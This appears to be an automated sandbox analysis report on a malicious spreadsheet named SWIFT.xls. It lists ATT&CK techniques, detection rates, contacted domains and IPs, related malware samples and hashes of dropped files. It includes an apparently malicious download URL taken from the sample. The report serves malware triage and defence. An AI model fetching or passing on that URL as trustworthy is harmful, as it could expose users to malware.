Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
Exploitation for Client Execution		1
DLL Side-Loading		1
Process Injection		3
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SWIFT.xls23%VirustotalBrowse
SWIFT.xls26%ReversingLabsDocument-PDF.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalse
    		high
    s.deemos.com
    		14.103.79.10
    		truefalse
      		unknown
      ax-0001.ax-msedge.net
      		150.171.27.10
      		truefalse
        		high
        sni1gl.wpc.sigmacdn.net
        		152.199.21.175
        		truefalse
          		high
          tse1.mm.bing.net
          		unknown
          		unknownfalse
            		high
            cxcs.microsoft.net
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetfalse
                		unknown
                https://chrome.cloudflare-dns.com/dns-queryfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://s.deemos.com/lqSa1Aoh?&linen=friSWIFT.xls, 06331000.0.drfalse
                    		unknown
                    http://www.wowform.comSWIFT.xls, F57DEEF0.emf.0.dr, 06331000.0.dr, 269A627E.emf.0.dr, DD5D6A9F.emf.0.dr, 8C207648.emf.0.dr, 9527D3D2.emf.32.dr, 794F9615.emf.0.dr, FA08C231.emf.0.dr, EE7A48AA.emf.0.drfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      14.103.79.10
                      		s.deemos.comChina
                      		18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
                      162.159.61.3
                      		chrome.cloudflare-dns.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      57.129.55.225
                      		unknownBelgium
                      		2686ATGS-MMD-ASUSfalse

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1578835
                      Start date and time:2024-12-20 15:26:22 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 8s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                      Run name:Potential for more IOCs and behavior
                      Number of analysed new started processes analysed:35
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:SWIFT.xls
                      Detection:MAL
                      Classification:mal76.expl.winXLS@21/46@4/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.194.30.59, 23.206.197.16, 23.206.197.26, 23.206.197.33, 23.206.197.17, 23.206.197.19, 23.206.197.18, 23.206.197.11, 23.206.197.24, 23.206.197.32, 52.109.28.46, 52.109.89.19, 52.113.194.132, 52.109.28.48, 51.105.71.137, 23.212.88.34, 52.31.218.129, 52.48.8.54, 34.252.184.159, 20.189.173.11, 142.251.32.99, 142.251.41.3, 23.33.40.132, 23.33.40.143, 23.200.197.122, 152.199.21.175, 20.190.147.3, 4.175.87.197, 20.199.58.43
                      • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, weu-azsc-000.roaming.officeapps.live.com, cxcs.microsoft.net.edgekey.net, mobile.events.data.microsoft.com, onedscolprduks03.uksouth.cloudapp.azure.com, e86303.dscx.akamaiedge.net, onedscolprdwus10.westus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, www.gstatic.com, e3230.b.akamaiedge.net, www.bing.com, ecs.office.com, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, cdn-office.ec.azureedge.net, www-www.bing.com.trafficmanager.net, aefd.nelreports.net, uks-azsc-000.odc.officeapps.live.com, x1.c.lencr.org, res-prod.trafficmanager.net, mm-mm.bing.net.trafficmanager.net, s-0005.s-msedge.net, store-images.s-microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, res-2.cdn.office.net, europe.odcsm1.live.com.akadn
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      09:28:34API Interceptor772x Sleep call for process: splwow64.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      162.159.61.3Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                        ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                          pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                            QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                  QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                      g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                        H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          sni1gl.wpc.sigmacdn.netinvoice.docmGet hashmaliciousMetasploitBrowse
                                          • 152.199.21.175
                                          Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                          • 152.199.21.175
                                          Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          index.html.docxGet hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4YGet hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                                          • 152.199.21.175
                                          wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                          • 152.199.21.175
                                          QyzM5yhuwd.exeGet hashmaliciousMedusaLockerBrowse
                                          • 152.199.21.175
                                          ax-0001.ax-msedge.nethttps://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                          • 150.171.27.10
                                          https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                          • 150.171.27.10
                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                          • 150.171.27.10
                                          ep_setup.exeGet hashmaliciousUnknownBrowse
                                          • 150.171.28.10
                                          ep_setup.exeGet hashmaliciousUnknownBrowse
                                          • 150.171.27.10
                                          https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                          • 150.171.28.10
                                          IzFEtXcext.dllGet hashmaliciousUnknownBrowse
                                          • 150.171.27.10
                                          slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                          • 150.171.28.10
                                          1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                          • 150.171.27.10
                                          kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                          • 150.171.28.10
                                          chrome.cloudflare-dns.comOcean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.61.3
                                          ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                          • 172.64.41.3
                                          pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                          • 162.159.61.3
                                          invoice.docmGet hashmaliciousMetasploitBrowse
                                          • 162.159.61.3
                                          ep_setup.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.61.3
                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                          • 172.64.41.3
                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                          • 162.159.61.3
                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                          • 172.64.41.3
                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                          • 172.64.41.3
                                          File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                          • 172.64.41.3

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          WORLDPHONE-INASNumberforInterdomainRoutingINOwari.arm.elfGet hashmaliciousUnknownBrowse
                                          • 14.103.40.223
                                          ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                          • 114.69.243.134
                                          SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                                          • 14.103.40.233
                                          3b4m3C11Vd.elfGet hashmaliciousMiraiBrowse
                                          • 14.103.92.59
                                          HTUyCRuDev.elfGet hashmaliciousUnknownBrowse
                                          • 114.69.243.149
                                          XoQ5jUCXz6.elfGet hashmaliciousMiraiBrowse
                                          • 14.103.40.218
                                          x86_32.elfGet hashmaliciousMiraiBrowse
                                          • 114.69.243.142
                                          qD1LXlBAL2.elfGet hashmaliciousMiraiBrowse
                                          • 14.103.40.250
                                          uVpRlUULE0.elfGet hashmaliciousMiraiBrowse
                                          • 114.69.243.138
                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                          • 104.21.12.88
                                          arm7.elfGet hashmaliciousMiraiBrowse
                                          • 162.159.132.75
                                          nsharm.elfGet hashmaliciousMiraiBrowse
                                          • 104.16.179.49
                                          https://www.tblgroup.com/tbl2/certificados-digitales/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                          • 104.17.25.14
                                          Invoice for 04-09-24 fede39.admr.org.htmlGet hashmaliciousUnknownBrowse
                                          • 104.22.21.144
                                          https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                          • 104.19.229.21
                                          http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8pGet hashmaliciousHTMLPhisherBrowse
                                          • 104.18.86.42
                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                          • 104.21.12.88
                                          Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                          • 172.64.41.3
                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                          • 172.67.197.170
                                          ATGS-MMD-ASUShmips.elfGet hashmaliciousMiraiBrowse
                                          • 51.238.254.102
                                          arm7.elfGet hashmaliciousMiraiBrowse
                                          • 57.50.158.22
                                          nsharm.elfGet hashmaliciousMiraiBrowse
                                          • 33.241.131.44
                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                          • 56.198.189.231
                                          la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                          • 57.146.109.82
                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                          • 33.211.47.171
                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 33.172.49.9
                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                          • 48.171.43.225
                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                          • 50.15.59.79

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                          Download File
                                          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):118
                                          Entropy (8bit):3.5700810731231707
                                          Encrypted:false
                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                          MD5:573220372DA4ED487441611079B623CD
                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):292
                                          Entropy (8bit):5.106356132296415
                                          Encrypted:false
                                          SSDEEP:6:PsnVQq2Pccwi2nKuAl9OmbnIFUt8I3xZmw+I3rkwOccwi2nKuAl9OmbjLJ:8Qv0cwZHAahFUt8Mx/+Mr5dcwZHAaSJ
                                          MD5:60B90096FF5E71FD158930E8B6AB2C07
                                          SHA1:4D3198AAB8DE7144ECD23FFA9B5A88AC68775216
                                          SHA-256:8BE6CF7A1B65707603C112F228D62AF0112EA7C6640B994E2FD32E2904B58510
                                          SHA-512:76E3CCC4829C1136F7C31E27C51214EF16421AC45985F234089398DA1D01B7CC637B371CA6F9B4CE838F4A9F6B2C908352859A131FB01DB9A06A6CDA48547637
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.499 2020 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-09:28:53.502 2020 Recovering log #3.2024/12/20-09:28:53.502 2020 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):292
                                          Entropy (8bit):5.106356132296415
                                          Encrypted:false
                                          SSDEEP:6:PsnVQq2Pccwi2nKuAl9OmbnIFUt8I3xZmw+I3rkwOccwi2nKuAl9OmbjLJ:8Qv0cwZHAahFUt8Mx/+Mr5dcwZHAaSJ
                                          MD5:60B90096FF5E71FD158930E8B6AB2C07
                                          SHA1:4D3198AAB8DE7144ECD23FFA9B5A88AC68775216
                                          SHA-256:8BE6CF7A1B65707603C112F228D62AF0112EA7C6640B994E2FD32E2904B58510
                                          SHA-512:76E3CCC4829C1136F7C31E27C51214EF16421AC45985F234089398DA1D01B7CC637B371CA6F9B4CE838F4A9F6B2C908352859A131FB01DB9A06A6CDA48547637
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.499 2020 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-09:28:53.502 2020 Recovering log #3.2024/12/20-09:28:53.502 2020 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):336
                                          Entropy (8bit):5.18217258208557
                                          Encrypted:false
                                          SSDEEP:6:PuJk1yq2Pccwi2nKuAl9Ombzo2jMGIFUt8IuLtqj1Zmw+Iu2q1RkwOccwi2nKuAv:WW4v0cwZHAa8uFUt8XLkj1/+X2qD5dcn
                                          MD5:5ADC5ADEFB7E9A7B832F93167411AE3C
                                          SHA1:B825E775E27A862505C0A6EEF16F519FBA1B8685
                                          SHA-256:145B01F493B4275E4D0B82F650BE140A21569F008ABF13445140C5DB951E335E
                                          SHA-512:D16026F21EB70770695DFD0A98CAAC0511B41C9BC7336CA923EA286587154974237FA6258F9A46210380DCC19FED71B1C865D621A6DBFCCEAF33B5D200F5626A
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.615 2070 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-09:28:53.617 2070 Recovering log #3.2024/12/20-09:28:53.618 2070 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):336
                                          Entropy (8bit):5.18217258208557
                                          Encrypted:false
                                          SSDEEP:6:PuJk1yq2Pccwi2nKuAl9Ombzo2jMGIFUt8IuLtqj1Zmw+Iu2q1RkwOccwi2nKuAv:WW4v0cwZHAa8uFUt8XLkj1/+X2qD5dcn
                                          MD5:5ADC5ADEFB7E9A7B832F93167411AE3C
                                          SHA1:B825E775E27A862505C0A6EEF16F519FBA1B8685
                                          SHA-256:145B01F493B4275E4D0B82F650BE140A21569F008ABF13445140C5DB951E335E
                                          SHA-512:D16026F21EB70770695DFD0A98CAAC0511B41C9BC7336CA923EA286587154974237FA6258F9A46210380DCC19FED71B1C865D621A6DBFCCEAF33B5D200F5626A
                                          Malicious:false
                                          Preview:2024/12/20-09:28:53.615 2070 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-09:28:53.617 2070 Recovering log #3.2024/12/20-09:28:53.618 2070 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0fb2835d-c989-4736-886f-4e187b4083a6.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:modified
                                          Size (bytes):444
                                          Entropy (8bit):4.973424573213178
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sqTusBd2caq3QYiubYnP7E4TX:Y2sRds2dJ3QYhbYP7n7
                                          MD5:3D8ED0AAA6D6BFA6FEF17212B60ACAEE
                                          SHA1:A2D1A9420DBF58618C1EEBCA6B8CC66A5077BB6B
                                          SHA-256:67BDF377A40D35086977C43A2FD8CCFDC3CFBEFEF8ECECE69520AC2F39E99016
                                          SHA-512:E9DB643A4EDC333B47ADD317EE834DED9E910BF026E538D398A6744727C6C1573FB1EA40B29311425E1C4F1967B6F1F09304111674B24B92AA7AF7DF6408375B
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379264940807340","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.24","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):444
                                          Entropy (8bit):4.973424573213178
                                          Encrypted:false
                                          SSDEEP:12:YH/um3RA8sqTusBd2caq3QYiubYnP7E4TX:Y2sRds2dJ3QYhbYP7n7
                                          MD5:3D8ED0AAA6D6BFA6FEF17212B60ACAEE
                                          SHA1:A2D1A9420DBF58618C1EEBCA6B8CC66A5077BB6B
                                          SHA-256:67BDF377A40D35086977C43A2FD8CCFDC3CFBEFEF8ECECE69520AC2F39E99016
                                          SHA-512:E9DB643A4EDC333B47ADD317EE834DED9E910BF026E538D398A6744727C6C1573FB1EA40B29311425E1C4F1967B6F1F09304111674B24B92AA7AF7DF6408375B
                                          Malicious:false
                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379264940807340","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.24","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2490
                                          Entropy (8bit):5.19984939517336
                                          Encrypted:false
                                          SSDEEP:48:k/tsLHT4MhflKz/w57sr8flKg9uiDxVtxDtqhLIPFVFpxDovjhZ:kVsLHTj2zYJs15at1shLED1UhZ
                                          MD5:E3AE3A1F3109A01C927B1864F181CE25
                                          SHA1:35C3BBBC366397732B731BC5F7A8A962FF453DEC
                                          SHA-256:B034C1941E25FCE33D466B8286615A7CFFD18FE9D58227F16EA3DB7C2671A4F3
                                          SHA-512:8040E54EC40E56C9C58C5678C1445AA55090A9A6F8441E17B4AD4A7BD2DFB287B764962E7681655D79FFA83A543073DA229A65EDEE07A54B79C9FBFDB06FCDCA
                                          Malicious:false
